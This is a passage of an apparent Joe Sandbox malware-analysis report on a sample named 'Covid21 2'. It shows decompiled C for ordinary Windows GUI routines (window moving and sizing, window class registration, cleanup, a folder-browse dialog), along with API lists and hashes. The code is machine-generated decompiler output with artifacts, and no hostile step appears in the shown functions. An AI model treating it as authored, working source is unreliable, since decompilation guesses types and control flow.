							if(_t129 != 0) {
								if(_t129 != 3) {
									if(_t129 != 6) {
										_v20.x = _v20.x + _t199;
										goto L58;
									}
									_t130 = 2;
									L28:
									_push(_t196[7] - _t130);
									_t196[0xc] = 8;
									_t181 = _t196[6] - _t130;
									goto L29;
								}
								_push(_t196[5]);
								_t196[0xc] = 5;
								_push(_t196[6]);
								goto L33;
							}
							_t134 = 2;
							_t196[0xc] = _t134;
							_push(_v20.y);
							_push(_t196[6] - _t134);
							goto L38;
						}
						if(_t126 != 1) {
							goto L66;
						}
						GetCursorPos( &_v20);
						_t190 = _t196[0xc];
						if(_t190 != 0) {
							_t130 = 2;
							if(_t190 != _t130) {
								if(_t190 != 1) {
									_v20.y = _v20.y + _t199;
									goto L58;
								}
								_push(_t196[7] - _t130);
								goto L32;
							}
							goto L28;
						}
						_t196[0xc] = 6;
						_push(_t196[7]);
						goto L26;
					}
					_t141 = _a16;
					_t196[1] = 0;
					_v20.y = _t141 >> 0x10;
					_v20.x = _t141;
					MapWindowPoints(_a4, 0,  &_v20, 1);
					E004050C1(_t196, _v20.x, _v20.y);
					_t46 =  &(_t196[4]); // 0x10
					SendMessageA(_a4, 0x214, _t196[0xc], _t46);
					_push(_a4);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					E004051A3();
					goto L65;
				}
				if(_a8 != 0x112) {
					goto L66;
				}
				_t201 = _a12;
				if((_t201 & 0x0000fff0) != 0xf000) {
					goto L66;
				}
				SystemParametersInfoA(0x26, 0,  &_v12, 0);
				if(_v12 == 0) {
					goto L66;
				}
				_t6 =  &(_t196[4]); // 0x10
				_t196[0xc] = _t201 & 0x0000000f;
				 *_t196 = 1;
				GetWindowRect(_a4, _t6);
				_t9 =  &(_t196[8]); // 0x20
				GetWindowRect(_a4, _t9);
				_t196[0xd] = 0;
				_t196[0xe] = 0;
				_t196[0xf] = GetSystemMetrics(0x3d);
				_t196[0x10] = GetSystemMetrics(0x3e);
				if((GetWindowLongA(_a4, 0xfffffff0) & 0x00800000) == 0) {
					if((GetWindowLongA(_a4, 0xffffffec) & 0x00000100) == 0) {
						_t196[0x11] = 0;
						_t196[0x12] = 0;
						goto L10;
					}
					_t175 = GetSystemMetrics(0x2d);
					_push(0x2e);
					goto L8;
				} else {
					_t175 = GetSystemMetrics(5);
					_push(6);
					L8:
					_t196[0x11] = _t175;
					_t196[0x12] = GetSystemMetrics(??);
					L10:
					_t196[0x13] = GetSystemMetrics(0x22);
					_t196[0x14] = GetSystemMetrics(0x23);
					_t196[0x15] = GetSystemMetrics(0x3b);
					_t196[0x16] = GetSystemMetrics(0x3c);
					_t29 =  &(_t196[0xd]); // 0x34
					SendMessageA(_a4, 0x24, 0, _t29);
					if(GetKeyState(1) == 0) {
						SendMessageA(_a4, 0x201, 1, 0);
					}
					SetCapture(_a4);
					PostMessageA(_a4, 0x231, 0, 0);
					if(_t196[0xc] != 0) {
						_t196[1] = 0;
					} else {
						_t196[1] = 1;
						GetCursorPos( &(_t196[2]));
						SetCursor(LoadImageA(0, 0x7f86, 2, 0, 0, 0x8040));
					}
					goto L65;
				}
			}

























                                  0x00405253
                                  0x00405259
                                  0x00405260
                                  0x004053be
                                  0x004053c6
                                  0x0040542e
                                  0x004055ec
                                  0x004055df
                                  0x004055df
                                  0x00405618
                                  0x00405618
                                  0x0040561b
                                  0x00405622
                                  0x00405622
                                  0x004055f3
                                  0x00000000
                                  0x00000000
                                  0x004055ff
                                  0x00405608
                                  0x0040560a
                                  0x00405612
                                  0x00405612
                                  0x00000000
                                  0x0040560a
                                  0x00405437
                                  0x0040543a
                                  0x00000000
                                  0x00000000
                                  0x00405440
                                  0x00405443
                                  0x00000000
                                  0x00000000
                                  0x0040544b
                                  0x0040544c
                                  0x0040544e
                                  0x0040558e
                                  0x00405594
                                  0x00405599
                                  0x004055b0
                                  0x004055ba
                                  0x004055c7
                                  0x004055ca
                                  0x004055d5
                                  0x004055da
                                  0x00000000
                                  0x004055da
                                  0x004055c1
                                  0x004054b9
                                  0x004054b9
                                  0x004054bc
                                  0x004054c3
                                  0x004054c3
                                  0x004054c8
                                  0x004054c8
                                  0x00000000
                                  0x004054c8
                                  0x004055b4
                                  0x0040556e
                                  0x00405573
                                  0x00405577
                                  0x0040557e
                                  0x004054a6
                                  0x004054a6
                                  0x004054a7
                                  0x00000000
                                  0x004054a7
                                  0x0040559b
                                  0x004055a2
                                  0x004055a5
                                  0x004054fa
                                  0x004054fa
                                  0x00000000
                                  0x004054fa
                                  0x00405454
                                  0x00405455
                                  0x00405531
                                  0x00405537
                                  0x0040553c
                                  0x0040554f
                                  0x00405552
                                  0x0040556c
                                  0x00405585
                                  0x00000000
                                  0x00405585
                                  0x00000000
                                  0x0040556c
                                  0x00405557
                                  0x0040555c
                                  0x00405563
                                  0x00000000
                                  0x00405563
                                  0x0040553e
                                  0x00405541
                                  0x00405483
                                  0x00405483
                                  0x00405486
                                  0x00000000
                                  0x00405486
                                  0x0040545b
                                  0x0040545c
                                  0x004054de
                                  0x004054e4
                                  0x004054e9
                                  0x00405504
                                  0x0040551b
                                  0x00405525
                                  0x00000000
                                  0x00405525
                                  0x0040551f
                                  0x00405494
                                  0x00405499
                                  0x0040549d
                                  0x004054a4
                                  0x00000000
                                  0x004054a4
                                  0x00405509
                                  0x0040550e
                                  0x00405515
                                  0x00000000
                                  0x00405515
                                  0x004054f0
                                  0x004054f1
                                  0x004054f4
                                  0x004054f9
                                  0x00000000
                                  0x004054f9
                                  0x0040545f
                                  0x00000000
                                  0x00000000
                                  0x00405469
                                  0x0040546f
                                  0x00405474
                                  0x0040548f
                                  0x00405492
                                  0x004054b1
                                  0x004054d2
                                  0x00000000
                                  0x004054d2
                                  0x004054b8
                                  0x00000000
                                  0x004054b8
                                  0x00000000
                                  0x00405492
                                  0x0040547b
                                  0x00405482
                                  0x00000000
                                  0x00405482
                                  0x004053c8
                                  0x004053d4
                                  0x004053d9
                                  0x004053e4
                                  0x004053e7
                                  0x004053f5
                                  0x004053fb
                                  0x0040540a
                                  0x00405415
                                  0x00405418
                                  0x00405419
                                  0x0040541a
                                  0x0040541b
                                  0x0040541c
                                  0x00000000
                                  0x00405421
                                  0x0040526d
                                  0x00000000
                                  0x00000000
                                  0x00405273
                                  0x00405282
                                  0x00000000
                                  0x00000000
                                  0x00405290
                                  0x00405299
                                  0x00000000
                                  0x00000000
                                  0x0040529f
                                  0x004052a9
                                  0x004052b2
                                  0x004052b8
                                  0x004052ba
                                  0x004052c1
                                  0x004052cb
                                  0x004052ce
                                  0x004052d5
                                  0x004052df
                                  0x004052ed
                                  0x00405306
                                  0x00405318
                                  0x0040531b
                                  0x00000000
                                  0x0040531b
                                  0x0040530a
                                  0x0040530c
                                  0x00000000
                                  0x004052ef
                                  0x004052f1
                                  0x004052f3
                                  0x0040530e
                                  0x0040530e
                                  0x00405313
                                  0x0040531e
                                  0x00405324
                                  0x0040532b
                                  0x00405332
                                  0x0040533d
                                  0x00405340
                                  0x0040534a
                                  0x00405357
                                  0x00405364
                                  0x00405364
                                  0x00405369
                                  0x00405379
                                  0x00405382
                                  0x004053b6
                                  0x00405384
                                  0x00405384
                                  0x0040538f
                                  0x004053ab
                                  0x004053ab
                                  0x00000000
                                  0x00405382

                                  APIs
                                  • SystemParametersInfoA.USER32(00000026,00000000,?,00000000), ref: 00405290
                                  • GetWindowRect.USER32(?,00000010), ref: 004052B8
                                  • GetWindowRect.USER32(?,00000020), ref: 004052C1
                                  • GetSystemMetrics.USER32(0000003D), ref: 004052D1
                                  • GetSystemMetrics.USER32(0000003E), ref: 004052D8
                                  • GetWindowLongA.USER32(?,000000F0), ref: 004052E2
                                  • GetSystemMetrics.USER32(00000005), ref: 004052F1
                                  • GetWindowLongA.USER32(?,000000EC), ref: 004052FC
                                  • GetSystemMetrics.USER32(0000002D), ref: 0040530A
                                  • GetSystemMetrics.USER32(0000002E), ref: 00405311
                                  • GetSystemMetrics.USER32(00000022), ref: 00405320
                                  • GetSystemMetrics.USER32(00000023), ref: 00405327
                                  • GetSystemMetrics.USER32(0000003B), ref: 0040532E
                                  • GetSystemMetrics.USER32(0000003C), ref: 00405335
                                  • SendMessageA.USER32(?,00000024,00000000,00000034), ref: 0040534A
                                  • GetKeyState.USER32(00000001), ref: 0040534E
                                  • SendMessageA.USER32(?,00000201,00000001,00000000), ref: 00405364
                                  • SetCapture.USER32(?), ref: 00405369
                                  • PostMessageA.USER32(?,00000231,00000000,00000000), ref: 00405379
                                  • GetCursorPos.USER32(-00000008), ref: 0040538F
                                  • LoadImageA.USER32(00000000,00007F86,00000002,00000000,00000000,00008040), ref: 004053A4
                                  • SetCursor.USER32(00000000), ref: 004053AB
                                  • MapWindowPoints.USER32(?,00000000,?,00000001), ref: 004053E7
                                  • SendMessageA.USER32(?,00000214,?,00000010), ref: 0040540A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: System$Metrics$Window$Message$Send$CursorLongRect$CaptureImageInfoLoadParametersPointsPostState
                                  • String ID:
                                  • API String ID: 985555588-0
                                  • Opcode ID: e10282ce0e36e189d93c3964f5e1b1cc79817ceec6a3e6fcf446dd530336dc79
                                  • Instruction ID: 586f9979426b920aefc07ff19cb97ca9c93cebbcd8dc2859b64a59a748dbd016
                                  • Opcode Fuzzy Hash: e10282ce0e36e189d93c3964f5e1b1cc79817ceec6a3e6fcf446dd530336dc79
                                  • Instruction Fuzzy Hash: ADC1A271A00A06BFDB10AF64CD48ABB7B75FB04340F50453BF905A66D0D779A8A1CF99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404B03, Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 238memoryregistryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 79%
                                  			E00404B03(void* __edx, void* __eflags, struct HWND__** _a4, int _a8, signed int _a12, int _a16, int _a20, CHAR* _a24, long _a28, struct HWND__* _a32) {
				struct tagRECT _v20;
				long _v24;
				struct _WNDCLASSA _v64;
				char _v320;
				struct HWND__** _t107;
				struct HINSTANCE__* _t112;
				intOrPtr _t113;
				intOrPtr _t114;
				struct HWND__* _t130;
				struct HWND__* _t136;
				struct HWND__* _t142;
				struct HWND__** _t143;
				struct HWND__* _t146;
				signed int _t157;
				int _t158;
				int _t161;
				signed int _t165;
				signed int _t166;
				long _t167;
				void* _t175;
				int _t177;
				struct HWND__** _t182;

				_t175 = __edx;
				_v24 = 1;
				_t107 = E0040662C( *0x40b474, _a4);
				_t182 = _t107;
				if(_a4 != 0xffffffff) {
					L3:
					_push(_a4);
					L4:
					sprintf( &_v320, "WindowClass_%d");
					if(_a24 == 0) {
						_a24 = 0x409000;
					}
					memset( &_v64, 0, 0x28);
					_t112 =  *0x40b140; // 0x400000
					_v64.hInstance = _t112;
					_t113 =  *0x40b47c; // 0xb028d
					_v64.hIcon = _t113;
					_t114 =  *0x40b480; // 0x10003
					_v64.hCursor = _t114;
					_v64.lpszClassName =  &_v320;
					_v64.style = 8;
					_v64.lpfnWndProc = 0x405b1f;
					_v64.cbWndExtra = 0;
					_v64.hbrBackground = 0x10;
					RegisterClassA( &_v64);
					_t165 = _a28;
					if((_t165 & 0x00000008) != 0) {
						_v24 = 0;
					}
					_t166 = _t165 & 0xfffffff7;
					if((_t166 & 0xeffffffc) == 0) {
						_t166 = _t166 | 0x00c00000;
					}
					if((_t166 & 0x10000000) == 0) {
						_a28 = 1;
					} else {
						_t166 = _t166 & 0xefffffff;
						_a28 = 0;
					}
					_v20.right = _a16;
					_v20.bottom = _a20;
					_v20.left = 0;
					_v20.top = 0;
					AdjustWindowRect( &_v20, _t166 & 0xfffffffc, 0);
					_t177 = _a8;
					_a16 = _v20.right - _v20.left;
					_a20 = _v20.bottom - _v20.top;
					if(_t177 == 0xffff0001 || _a12 == 0xffff0001) {
						if((_t166 & 0x00000003) == 0) {
							_t177 = 0x80000000;
							_a12 = 0x80000000;
						}
					}
					if((_t166 & 0x00000001) == 0) {
						if((_t166 & 0x00000002) == 0) {
							goto L30;
						}
						_t146 = _a32;
						if(_t146 != 0) {
							L26:
							GetWindowRect(_t146,  &_v20);
							asm("cdq");
							_t177 = (_v20.right - _v20.left - _a16 - _t175 >> 1) + _v20.left;
							asm("cdq");
							_t157 = (_v20.bottom - _v20.top - _a20 - _t175 >> 1) + _v20.top;
							_a12 = _t157;
							if(_t177 < 0) {
								_t177 = 0;
							}
							if(_t157 < 0) {
								_a12 = _a12 & 0x00000000;
							}
							goto L30;
						}
						_t146 = GetActiveWindow();
						if(_t146 == 0) {
							goto L30;
						}
						goto L26;
					} else {
						_t158 = GetSystemMetrics(0);
						if(_a16 > _t158) {
							_a16 = _t158;
						}
						asm("cdq");
						_t177 = _t158 - _a16 - _t175 >> 1;
						_t161 = GetSystemMetrics(1);
						if(_a20 > _t161) {
							_a20 = _t161;
						}
						asm("cdq");
						_a12 = _t161 - _a20 - _t175 >> 1;
						L30:
						_t167 = _t166 & 0xfffffffc;
						_t130 = CreateWindowExA(0,  &_v320, _a24, _t167, _t177, _a12, _a16, _a20, _a32, 0,  *0x40b140, 0);
						 *_t182 = _t130;
						if(_t130 == 0) {
							UnregisterClassA( &_v320,  *0x40b140);
							E004066BB( *0x40b474, _a4);
							return 0;
						}
						SetPropA(_t130, "PB_WindowID",  &(_a4[0]));
						if(_a28 != 0) {
							if((_t167 & 0x01000000) == 0) {
								if((_t167 & 0x20000000) == 0) {
									_push(1);
								} else {
									_push(2);
								}
							} else {
								_push(3);
							}
							ShowWindow( *_t182, ??);
						}
						asm("sbb ebx, ebx");
						_t182[0xb] =  ~( ~(_t167 & 0x21000000));
						_t182[4] = 2;
						_t136 = RtlAllocateHeap( *0x40b13c, 0, 0xc);
						_t182[1] = _t136;
						_t136->i = 9;
						 *((short*)(_t182[1] + 4)) = 0xfa01;
						 *(_t182[1]) = 3;
						 *((short*)(_t182[1] + 8)) = 9;
						 *((short*)(_t182[1] + 0xa)) = 0xfa02;
						 *((char*)(_t182[1] + 6)) = 7;
						_t142 = CreateAcceleratorTableA(_t182[1], _t182[4]);
						_t182[5] = _t182[5] | 0xffffffff;
						_t182[2] = _t142;
						_t182[7] = 0;
						if(_v24 != 0) {
							_push( *_t182);
							E00407EE3();
						}
						_t143 = _a4;
						if(_t143 == _t182) {
							return _t143;
						} else {
							return  *_t182;
						}
					}
				}
				_a4 = _t182;
				if(_t182 != 0xffffffff) {
					goto L3;
				} else {
					_push(_t107);
					goto L4;
				}
			}

























                                  0x00404b03
                                  0x00404b12
                                  0x00404b1f
                                  0x00404b28
                                  0x00404b2a
                                  0x00404b37
                                  0x00404b37
                                  0x00404b3a
                                  0x00404b46
                                  0x00404b53
                                  0x00404b55
                                  0x00404b55
                                  0x00404b63
                                  0x00404b68
                                  0x00404b6d
                                  0x00404b70
                                  0x00404b75
                                  0x00404b78
                                  0x00404b7d
                                  0x00404b86
                                  0x00404b90
                                  0x00404b97
                                  0x00404b9e
                                  0x00404ba1
                                  0x00404ba8
                                  0x00404bae
                                  0x00404bb4
                                  0x00404bb6
                                  0x00404bb6
                                  0x00404bb9
                                  0x00404bc2
                                  0x00404bc4
                                  0x00404bc4
                                  0x00404bd0
                                  0x00404bdd
                                  0x00404bd2
                                  0x00404bd2
                                  0x00404bd8
                                  0x00404bd8
                                  0x00404be7
                                  0x00404bed
                                  0x00404bfb
                                  0x00404bfe
                                  0x00404c01
                                  0x00404c0d
                                  0x00404c10
                                  0x00404c19
                                  0x00404c23
                                  0x00404c2d
                                  0x00404c2f
                                  0x00404c34
                                  0x00404c34
                                  0x00404c2d
                                  0x00404c3a
                                  0x00404c76
                                  0x00000000
                                  0x00000000
                                  0x00404c78
                                  0x00404c7d
                                  0x00404c89
                                  0x00404c8e
                                  0x00404c9d
                                  0x00404cad
                                  0x00404cb0
                                  0x00404cb5
                                  0x00404cba
                                  0x00404cbd
                                  0x00404cbf
                                  0x00404cbf
                                  0x00404cc3
                                  0x00404cc5
                                  0x00404cc5
                                  0x00000000
                                  0x00404cc3
                                  0x00404c7f
                                  0x00404c87
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00404c3c
                                  0x00404c3e
                                  0x00404c47
                                  0x00404c49
                                  0x00404c49
                                  0x00404c51
                                  0x00404c56
                                  0x00404c58
                                  0x00404c61
                                  0x00404c63
                                  0x00404c63
                                  0x00404c69
                                  0x00404c6e
                                  0x00404cc9
                                  0x00404cd2
                                  0x00404cef
                                  0x00404cf9
                                  0x00404cfb
                                  0x00404dc9
                                  0x00404dd8
                                  0x00000000
                                  0x00404ddd
                                  0x00404d0c
                                  0x00404d15
                                  0x00404d1d
                                  0x00404d29
                                  0x00404d2f
                                  0x00404d2b
                                  0x00404d2b
                                  0x00404d2b
                                  0x00404d1f
                                  0x00404d1f
                                  0x00404d1f
                                  0x00404d33
                                  0x00404d33
                                  0x00404d41
                                  0x00404d48
                                  0x00404d4b
                                  0x00404d58
                                  0x00404d5e
                                  0x00404d61
                                  0x00404d6a
                                  0x00404d73
                                  0x00404d79
                                  0x00404d82
                                  0x00404d8b
                                  0x00404d95
                                  0x00404d9b
                                  0x00404da2
                                  0x00404da5
                                  0x00404da8
                                  0x00404daa
                                  0x00404dac
                                  0x00404dac
                                  0x00404db1
                                  0x00404db6
                                  0x00404de3
                                  0x00404db8
                                  0x00000000
                                  0x00404db8
                                  0x00404db6
                                  0x00404c3a
                                  0x00404b2f
                                  0x00404b32
                                  0x00000000
                                  0x00404b34
                                  0x00404b34
                                  0x00000000
                                  0x00404b34

                                  APIs
                                  • sprintf.MSVCRT ref: 00404B46
                                  • memset.MSVCRT ref: 00404B63
                                  • RegisterClassA.USER32(00000000), ref: 00404BA8
                                  • AdjustWindowRect.USER32(?,00000010,00000000), ref: 00404C01
                                  • GetSystemMetrics.USER32(00000000), ref: 00404C3E
                                  • GetSystemMetrics.USER32(00000001), ref: 00404C58
                                  • GetActiveWindow.USER32 ref: 00404C7F
                                  • GetWindowRect.USER32(?,?), ref: 00404C8E
                                  • CreateWindowExA.USER32(00000000,?,?,00000010,00000000,?,00000001,00000000,?,00000000,00000000), ref: 00404CEF
                                  • SetPropA.USER32(00000000,PB_WindowID,00000100), ref: 00404D0C
                                  • ShowWindow.USER32(00000000,00000001,?,?,?,?,?,00000000), ref: 00404D33
                                  • RtlAllocateHeap.NTDLL(00000000,0000000C), ref: 00404D58
                                  • CreateAcceleratorTableA.USER32(?,?,?,?,?,?,?,00000000), ref: 00404D95
                                  • UnregisterClassA.USER32(?), ref: 00404DC9
                                    • Part of subcall function 004066BB: memset.MSVCRT ref: 004066D8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: Window$ClassCreateMetricsRectSystemmemset$AcceleratorActiveAdjustAllocateHeapPropRegisterShowTableUnregistersprintf
                                  • String ID: PB_WindowID$WindowClass_%d
                                  • API String ID: 1820370190-2937193648
                                  • Opcode ID: df5e665b80dd526419b541482955163d8fd811b305854d5719021b4815e158c8
                                  • Instruction ID: c7ce8232fcfdd9da0e6d01810650b6905c309b16ddaece5cc0acf35632e3a176
                                  • Opcode Fuzzy Hash: df5e665b80dd526419b541482955163d8fd811b305854d5719021b4815e158c8
                                  • Instruction Fuzzy Hash: 49A17BB190020ADFDB10CF68D989B9EBBF4FF44344F14862AF955A32A0D778D950CB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404925, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 73memorywindowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 77%
                                  			E00404925(void* __edi, void* __eflags, intOrPtr _a4) {
				char _v260;
				int* _t11;
				struct HWND__* _t12;
				struct HWND__* _t15;
				void* _t21;
				void* _t29;
				int* _t32;
				void* _t33;

				_t29 = __edi;
				_t11 = E00406690( *0x40b474, _a4);
				_t32 = _t11;
				if(_t32 != 0) {
					_t12 = GetWindow( *_t32, 4);
					if(_t12 != 0 && _t32[7] == 0) {
						SetActiveWindow(_t12);
					}
					_push(_t29);
					RemovePropA( *_t32, "PB_WindowID");
					if(RemovePropA( *_t32, "PB_DropAccept") != 0) {
						 *0x40a894( *_t32);
					}
					_t15 = _t32[7];
					if(_t15 == 0) {
						 *0x40a79c( *_t32);
						sprintf( &_v260, "WindowClass_%d", _a4);
						UnregisterClassA( &_v260,  *0x40b140);
					} else {
						SendMessageA(_t15, 0x221,  *_t32, 0);
					}
					_t21 = _t32[1];
					if(_t21 != 0) {
						HeapFree( *0x40b13c, 0, _t21);
						DestroyAcceleratorTable(_t32[2]);
					}
					_t33 = _t32[6];
					if(_t33 != 0) {
						DeleteObject(_t33);
					}
					return E004066BB( *0x40b474, _a4);
				}
				return _t11;
			}











                                  0x00404925
                                  0x00404938
                                  0x0040493d
                                  0x00404941
                                  0x0040494b
                                  0x00404953
                                  0x0040495c
                                  0x0040495c
                                  0x00404962
                                  0x00404970
                                  0x0040497e
                                  0x00404982
                                  0x00404982
                                  0x00404988
                                  0x0040498d
                                  0x004049a3
                                  0x004049b8
                                  0x004049cd
                                  0x0040498f
                                  0x00404999
                                  0x00404999
                                  0x004049d3
                                  0x004049d8
                                  0x004049e3
                                  0x004049ec
                                  0x004049ec
                                  0x004049f2
                                  0x004049f7
                                  0x004049fa
                                  0x004049fa
                                  0x00000000
                                  0x00404a09
                                  0x00404a10

                                  APIs
                                  • GetWindow.USER32(00000000,00000004), ref: 0040494B
                                  • SetActiveWindow.USER32(00000000), ref: 0040495C
                                  • RemovePropA.USER32(00000000,PB_WindowID), ref: 00404970
                                  • RemovePropA.USER32(00000000,PB_DropAccept), ref: 00404979
                                  • RevokeDragDrop.OLE32(00000000), ref: 00404982
                                  • SendMessageA.USER32(?,00000221,00000000,00000000), ref: 00404999
                                  • sprintf.MSVCRT ref: 004049B8
                                  • UnregisterClassA.USER32(?), ref: 004049CD
                                  • HeapFree.KERNEL32(00000000,?), ref: 004049E3
                                  • DestroyAcceleratorTable.USER32(?), ref: 004049EC
                                  • DeleteObject.GDI32(?), ref: 004049FA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: PropRemoveWindow$AcceleratorActiveClassDeleteDestroyDragDropFreeHeapMessageObjectRevokeSendTableUnregistersprintf
                                  • String ID: PB_DropAccept$PB_WindowID$WindowClass_%d
                                  • API String ID: 192457453-976223216
                                  • Opcode ID: b276470ce38247df909007b1919a474eca168de931713324b91e1c49e89625a6
                                  • Instruction ID: f0b996a718386a9457227e303234a4a67d6852f77ee41d513e9fa1cdc6f7bee2
                                  • Opcode Fuzzy Hash: b276470ce38247df909007b1919a474eca168de931713324b91e1c49e89625a6
                                  • Instruction Fuzzy Hash: 38214C71500304EBDB226F61DD09F57BBB9EB44740F148436BA81B21A4C77AD8619B9D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004036F8, Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 106librarystringloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 72%
                                  			E004036F8(void* __ecx, void* __esi, intOrPtr _a4, _Unknown_base(*)()* _a8, intOrPtr _a12) {
				struct HINSTANCE__* _v8;
				char* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void _v40;
				int _v41;
				char _v300;
				struct HINSTANCE__* _t35;
				int _t41;
				_Unknown_base(*)()* _t51;
				char* _t56;
				int* _t57;
				int _t59;
				void* _t61;
				void* _t65;
				char* _t68;
				void* _t69;
				void* _t73;

				_t65 = __esi;
				_t61 = __ecx;
				_t59 = 0;
				_t73 =  *0x40b204 - _t59; // 0x0
				if(_t73 == 0) {
					 *0x40b204 = 1;
					 *0x40a88c(0);
				}
				memset( &_v40, _t59, 0x20);
				_t35 = LoadLibraryA("SHELL32.DLL");
				_v8 = _t35;
				if(_t35 == _t59) {
					L12:
					 *(E00407750(0x104, _a12)) = 0;
					L13:
					return E004077F0(0x104 - _t59);
				}
				if(_a8 == _t59) {
					_a8 = 0x409000;
				}
				strncpy( &_v300, _a8, 0x103);
				_v41 = _t59;
				_t41 = strlen( &_v300);
				if(_t41 > 3) {
					_t57 = _t69 + _t41 - 0x129;
					if( *_t57 == 0x5c) {
						 *_t57 = _t59;
					}
				}
				_a8 = GetProcAddress(_v8, "SHBrowseForFolder");
				_v28 = _a4;
				_v40 = E0040390D(_t61);
				_v24 = 0x40;
				_v20 = E004036D1;
				_v16 =  &_v300;
				E004038B5(1);
				_a8 = _a8( &_v40, _t65);
				E004038B5(0);
				if(_a8 != _t59) {
					_t51 = GetProcAddress(_v8, "SHGetPathFromIDList");
					_t68 = E00407750(0x104, _a12);
					 *_t68 = 0;
					 *_t51(_a8, _t68);
					 *0x40a890(_a8);
					_t59 = strlen(_t68);
					_t56 =  &(_t68[_t59]);
					if( *((char*)(_t56 - 1)) != 0x5c) {
						 *_t56 = 0x5c;
						_t56[1] = 0;
						_t59 = _t59 + 1;
					}
				}
				FreeLibrary(_v8);
				if(_t59 != 0) {
					goto L13;
				} else {
					goto L12;
				}
			}






















                                  0x004036f8
                                  0x004036f8
                                  0x00403702
                                  0x00403704
                                  0x0040370b
                                  0x0040370e
                                  0x00403718
                                  0x00403718
                                  0x00403725
                                  0x00403732
                                  0x0040373a
                                  0x00403742
                                  0x00403834
                                  0x0040383d
                                  0x00403840
                                  0x0040384b
                                  0x0040384b
                                  0x0040374b
                                  0x0040374d
                                  0x0040374d
                                  0x00403763
                                  0x0040376f
                                  0x00403772
                                  0x0040377d
                                  0x0040377f
                                  0x00403789
                                  0x0040378b
                                  0x0040378b
                                  0x00403789
                                  0x0040379e
                                  0x004037a4
                                  0x004037ac
                                  0x004037b7
                                  0x004037be
                                  0x004037c5
                                  0x004037c8
                                  0x004037d6
                                  0x004037d9
                                  0x004037e1
                                  0x004037eb
                                  0x004037f8
                                  0x004037fe
                                  0x00403801
                                  0x00403806
                                  0x00403812
                                  0x00403814
                                  0x0040381c
                                  0x0040381e
                                  0x00403821
                                  0x00403825
                                  0x00403825
                                  0x0040381c
                                  0x00403829
                                  0x00403832
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000

                                  APIs
                                  • CoInitialize.OLE32(00000000), ref: 00403718
                                  • memset.MSVCRT ref: 00403725
                                  • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000000), ref: 00403732
                                  • strncpy.MSVCRT ref: 00403763
                                  • strlen.MSVCRT ref: 00403772
                                  • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 0040379C
                                  • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 004037EB
                                  • strlen.MSVCRT ref: 0040380D
                                  • FreeLibrary.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00403829
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
